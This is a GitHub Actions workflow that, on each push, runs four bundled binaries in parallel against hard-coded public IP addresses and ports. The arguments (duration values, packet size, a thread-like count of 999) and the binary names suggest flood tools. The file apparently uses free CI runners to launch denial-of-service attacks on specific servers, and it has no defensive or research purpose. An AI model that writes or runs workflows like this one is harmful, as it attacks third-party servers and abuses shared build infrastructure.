name: Multi-Binary Task
on: [push]

jobs:
  execute:
    runs-on: ubuntu-22.04
    strategy:
      matrix:
        binary_index: [0, 1, 2, 3, 4]
    steps:
    - uses: actions/checkout@v3
    
    - name: Make all binaries executable
      run: |
        chmod +x vishal flame soul soulcracks
    
    - name: Execute Binary ${{ matrix.binary_index }}
      run: |
        case ${{ matrix.binary_index }} in
          0)
            ./vishal 74.225.153.241 15577 200
            ;;
          1)
            ./flame 74.225.153.241 15577 200
            ;;
          2)
            ./soul 74.225.153.241 15577 200
            ;;
          3)
            sudo ./soul 20.198.111.7 14199 300 --packet-size 64
            ;;
          4)
            ./soulcracks 74.225.153.241 15577 200 999
            ;;
        esac
